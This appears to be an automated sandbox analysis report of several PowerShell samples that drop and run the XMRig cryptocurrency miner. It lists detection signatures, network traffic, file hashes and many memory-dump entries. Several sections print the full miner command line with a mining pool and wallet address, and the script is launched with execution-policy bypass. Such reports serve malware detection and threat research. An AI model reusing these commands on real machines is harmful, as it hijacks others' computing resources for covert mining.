memory/2860-103-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-104-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-105-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-106-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-107-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-108-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-109-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-110-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-111-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-112-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-113-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-114-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-115-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-116-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-117-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-118-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-119-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-120-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-121-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-122-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-123-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-124-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-125-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-126-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-127-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-128-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-129-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-130-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-131-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-132-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-133-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-134-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-135-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-136-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-137-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-138-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-139-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-140-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-141-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-142-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-143-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-144-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-145-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-146-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-147-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-148-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-149-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-150-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-151-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-152-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-153-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-154-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-155-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-156-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-157-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:33

Platform

win10v2004-20240508-en

Max time kernel

1800s

Max time network

1743s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 138.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.178.89.13.in-addr.arpa udp

Files

memory/2808-0-0x00007FFB16103000-0x00007FFB16105000-memory.dmp

memory/2808-6-0x000001DEA9090000-0x000001DEA90B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nvbedppy.ow3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2808-11-0x00007FFB16100000-0x00007FFB16BC1000-memory.dmp

memory/2808-12-0x00007FFB16100000-0x00007FFB16BC1000-memory.dmp

memory/2808-14-0x00007FFB16100000-0x00007FFB16BC1000-memory.dmp

memory/2808-15-0x000001DEA9C00000-0x000001DEA9C12000-memory.dmp

memory/2808-16-0x000001DEA9BE0000-0x000001DEA9BEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1184-47-0x000001ABC2B40000-0x000001ABC2B60000-memory.dmp

memory/1184-48-0x000001ABC2B90000-0x000001ABC2BB0000-memory.dmp

memory/1184-49-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-50-0x000001ABC2BB0000-0x000001ABC2BD0000-memory.dmp

memory/1184-51-0x000001ABC4490000-0x000001ABC44B0000-memory.dmp

memory/2808-53-0x00007FFB16103000-0x00007FFB16105000-memory.dmp

memory/1184-52-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/2808-54-0x00007FFB16100000-0x00007FFB16BC1000-memory.dmp

memory/1184-55-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/2808-56-0x00007FFB16100000-0x00007FFB16BC1000-memory.dmp

memory/1184-59-0x000001ABC4490000-0x000001ABC44B0000-memory.dmp

memory/1184-58-0x000001ABC2BB0000-0x000001ABC2BD0000-memory.dmp

memory/1184-57-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-60-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-61-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-62-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-63-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-64-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-65-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-66-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-67-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-68-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-69-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-70-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-71-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-72-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-73-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-74-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-75-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-76-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-77-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-78-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-79-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-80-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-81-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-82-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-83-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-84-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-85-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-86-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-87-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-88-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-89-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-90-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-91-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-92-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-93-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-94-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-95-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-96-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-97-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-98-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-99-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-100-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-101-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-102-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-103-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-104-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-105-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-106-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-107-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-108-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-109-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-110-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-111-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-112-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-113-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-114-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-115-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-116-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-117-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

memory/1184-118-0x00007FF746F90000-0x00007FF747BC3000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win10v2004-20240426-en

Max time kernel

1798s

Max time network

1745s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp

Files

memory/4496-0-0x00007FFFEF2C3000-0x00007FFFEF2C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vozucatt.w1y.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4496-7-0x0000026EE7E60000-0x0000026EE7E82000-memory.dmp

memory/4496-11-0x00007FFFEF2C0000-0x00007FFFEFD81000-memory.dmp

memory/4496-12-0x00007FFFEF2C0000-0x00007FFFEFD81000-memory.dmp

memory/4496-14-0x00007FFFEF2C0000-0x00007FFFEFD81000-memory.dmp

memory/4496-15-0x0000026EE7E10000-0x0000026EE7E22000-memory.dmp

memory/4496-16-0x0000026EE7DF0000-0x0000026EE7DFA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2764-47-0x000001DA63D30000-0x000001DA63D50000-memory.dmp

memory/2764-48-0x000001DA63DA0000-0x000001DA63DC0000-memory.dmp

memory/2764-49-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-51-0x000001DA63DE0000-0x000001DA63E00000-memory.dmp

memory/2764-50-0x000001DA63DC0000-0x000001DA63DE0000-memory.dmp

memory/4496-53-0x00007FFFEF2C3000-0x00007FFFEF2C5000-memory.dmp

memory/2764-52-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/4496-54-0x00007FFFEF2C0000-0x00007FFFEFD81000-memory.dmp

memory/4496-56-0x00007FFFEF2C0000-0x00007FFFEFD81000-memory.dmp

memory/2764-55-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-57-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-58-0x000001DA63DC0000-0x000001DA63DE0000-memory.dmp

memory/2764-59-0x000001DA63DE0000-0x000001DA63E00000-memory.dmp

memory/2764-60-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-61-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-62-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-63-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-64-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-65-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-66-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-67-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-68-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-69-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-70-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-71-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-72-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-73-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-74-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-75-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-76-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-77-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-78-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-79-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-80-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-81-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-82-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-83-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-84-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-85-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-86-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-87-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-88-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-89-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-90-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-91-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-92-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-93-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-94-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-95-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-96-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-97-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-98-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-99-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-100-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-101-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-102-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-103-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-104-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-105-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-106-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-107-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-108-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-109-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-110-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-111-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-112-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-113-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-114-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-115-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-116-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-117-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

memory/2764-118-0x00007FF66EA90000-0x00007FF66F6C3000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1769s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
